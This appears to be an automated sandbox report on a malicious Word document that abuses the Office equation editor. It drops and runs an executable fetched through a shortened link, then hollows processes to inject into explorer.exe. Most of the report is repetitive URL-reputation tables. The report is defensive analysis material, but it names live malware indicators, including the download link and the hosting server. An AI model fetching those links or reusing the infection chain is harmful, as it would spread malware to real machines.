        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading121LSA SecretsVirtualization/Sandbox Evasion3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonValid Accounts1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection712/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRundll321Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 344787 Sample: IMG-50230.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Yara detected AntiVM_3 2->47 49 11 other signatures 2->49 10 EQNEDT32.EXE 13 2->10         started        15 WINWORD.EXE 291 26 2->15         started        process3 dnsIp4 37 67.199.248.11, 49165, 80 GOOGLE-PRIVATE-CLOUDUS United States 10->37 39 neuromedic.com.br 177.70.106.69, 49166, 80 MandicSABR Brazil 10->39 41 bit.ly 10->41 33 C:\Users\user\AppData\...\IMG-50230[1].pdf, PE32 10->33 dropped 35 C:\Users\Public\69577.exe, PE32 10->35 dropped 69 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->69 17 69577.exe 12 3 10->17         started        file5 signatures6 process7 file8 31 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 17->31 dropped 51 Machine Learning detection for dropped file 17->51 53 Writes to foreign memory regions 17->53 55 Allocates memory in foreign processes 17->55 57 2 other signatures 17->57 21 AddInProcess32.exe 17->21         started        signatures9 process10 signatures11 59 Modifies the context of a thread in another process (thread injection) 21->59 61 Maps a DLL or memory area into another process 21->61 63 Sample uses process hollowing technique 21->63 65 2 other signatures 21->65 24 explorer.exe 21->24 injected process12 process13 26 rundll32.exe 24->26         started        signatures14 67 Tries to detect virtualization through RDTSC time measurements 26->67 29 cmd.exe 26->29         started        process15

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-50230[1].pdf100%Joe Sandbox ML
        C:\Users\Public\69577.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        5.2.AddInProcess32.exe.80000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        neuromedic.com.br1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.iis.fhg.de/audioPA0%URL Reputationsafe
        http://www.iis.fhg.de/audioPA0%URL Reputationsafe
        http://www.iis.fhg.de/audioPA0%URL Reputationsafe
        http://www.iis.fhg.de/audioPA0%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
        http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
        http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
        http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://cgi.search.biglobe.ne.jp/favicon.ico0%VirustotalBrowse
        http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://buscar.ozu.es/0%VirustotalBrowse
        http://buscar.ozu.es/0%Avira URL Cloudsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://ocsp.pki.goog/gsr2020%URL Reputationsafe
        http://ocsp.pki.goog/gsr2020%URL Reputationsafe
        http://ocsp.pki.goog/gsr2020%URL Reputationsafe
        http://ocsp.pki.goog/gsr2020%URL Reputationsafe
        https://pki.goog/repository/00%URL Reputationsafe
        https://pki.goog/repository/00%URL Reputationsafe
        https://pki.goog/repository/00%URL Reputationsafe
        https://pki.goog/repository/00%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
        http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
        http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
        http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://www.ozu.es/favicon.ico0%VirustotalBrowse
        http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
        http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
        http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        neuromedic.com.br
        177.70.106.69
        truefalseunknown
        bit.ly
        67.199.248.10
        truefalse
          high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://bit.ly/3iWebUTfalse
            high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
              high
              http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://search.ebay.de/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                high
                http://www.mtv.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                  high
                  http://www.rambler.ru/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                    high
                    http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                      high
                      http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                        high
                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.2126009473.000000000861C000.00000004.00000001.sdmpfalse
                          high
                          http://buscar.ya.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                            high
                            http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2119295194.0000000004B50000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl069577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://asp.usatoday.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://rover.ebay.comexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://ocsp.pki.goog/gts1o1core069577.exe, 00000004.00000002.2111244695.0000000002268000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://search.ebay.in/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://%s.comexplorer.exe, 00000006.00000000.2129984121.000000000A330000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            low
                                            http://msk.afisha.ru/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name69577.exe, 00000004.00000002.2111230551.0000000002241000.00000004.00000001.sdmpfalse
                                                high
                                                http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://search.rediff.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://search.naver.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://www.google.ru/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • 0%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://search.daum.net/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://buscar.ozu.es/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • 0%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://search.about.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://ocsp.pki.goog/gsr20269577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://pki.goog/repository/069577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.2118547561.00000000041AD000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://www.ask.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://www.cjmall.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://search.centrum.cz/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://suche.t-online.de/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.google.it/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.auction.co.kr/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.ceneo.pl/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.amazon.de/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2126009473.000000000861C000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://sads.myspace.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://crl.pki.goog/gsr2/gsr2.crl0?69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://crl.entrust.net/2048ca.crl069577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpfalse
                                                                                                  high
                                                                                                  http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://search.sify.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://search.ebay.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://search.nifty.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://www.google.si/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.google.cz/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.soso.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.univision.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://search.ebay.it/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://busca.orange.es/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2129984121.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.target.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://buscador.terra.es/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.iask.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.tesco.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://search.interpark.com/explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpfalse
